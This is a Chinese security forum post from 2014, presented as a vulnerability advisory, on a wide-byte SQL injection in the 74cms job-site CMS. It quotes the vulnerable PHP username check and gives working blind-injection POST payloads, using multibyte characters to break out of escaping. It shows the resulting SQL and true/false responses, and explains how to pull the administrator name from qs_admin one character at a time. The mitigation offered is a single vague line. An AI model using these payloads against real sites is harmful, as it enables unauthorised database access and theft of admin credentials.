切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
74cms通杀整站宽字节注入漏洞测试版本74cms_v3.4.20140115[ CodeSec-2014-0004 ][复制链接]
发表于 2014-2-23 15:38:37 | 显示全部楼层 |!read_mode!

开发者漏洞预警 —— 74cms通杀整站宽字节注入漏洞 [ CodeSec-2014-0003 ]

漏洞编号: CodeSec-2014-0003

漏洞标题: 74cms通杀整站宽字节注入漏洞

漏洞类型: 宽字节注入

漏洞危害等级: 高危

漏洞状态: 漏洞发布,联系作者中...

漏洞细节:
见帖子内容

修补方案:
用更安全的转码方式

源码地址:
http://www.74cms.com/

论坛备份源码地址:
http://pan.baidu.com/s/1qWEtkra

开发者回复: 暂无

漏洞代码举例
/plus/ajax_user.php
elseif($act =='check_usname')
{
        require_once(QISHI_ROOT_PATH.'include/fun_user.php');
        $usname=trim($_POST['usname']);
        if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0)
        {
        $usname=iconv("utf-8",QISHI_DBCHARSET,$usname);
        }
        $user=get_user_inusername($usname);
         empty($user)?exit("true"):exit("false");
}


再看include/fun_user.php里get_user_inusername函数
function get_user_inusername($username)
{
        global $db;
        $sql = "select * from ".table('members')." where username = '{$username}' LIMIT 1";
        return $db->getone($sql);
}


测试方式
url
http://www.74cms.me/plus/ajax_user.php?act=check_usname


post
usname=s%E9%8C%A6' or cast(ascii(substring((select admin_name from qs_admin),2,1))>100 as signed)  %23


%E9%8C%A6  为  錦  字的rawurlencode值,注意不是urlencode值

get_user_inusername方法中执行的sql为
select * from qs_members where username = '錦\' or cast(ascii(substring((select admin_name from qs_admin),2,1))>100 as signed) #' LIMIT 1


结果返回 true

post
usname=%E9%8C%A6' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed)  %23

这里把100改为了99

get_user_inusername方法中执行的sql为

select * from qs_members where username = '錦\' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed) #' LIMIT 1


结果返回了 false


换一组宽字节的字符同样可以得到如上述的效果
post
usname=%E7%A9%BA%E9%81%8B' or cast(ascii(substring((select admin_name from qs_admin),2,1))>99 as signed)  %23

%E7%A9%BA%E9%81%8B   为    空運


语句拆解讲解
select admin_name from qs_admin
如果表里只有admin这一个用户则返回admin
select ascii(substring((select admin_name from qs_admin),2,1))   等于100,mysql函数substring、ascii、cast自己百度学习下

所以sql为
select cast(100>99 as signed)   等于 1
select cast(100>100 as signed)  等于 0
整站编码转换使用代码
        if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0)
        {
        $usname=iconv("utf-8",QISHI_DBCHARSET,$usname);
        }




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-9-19 04:23

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部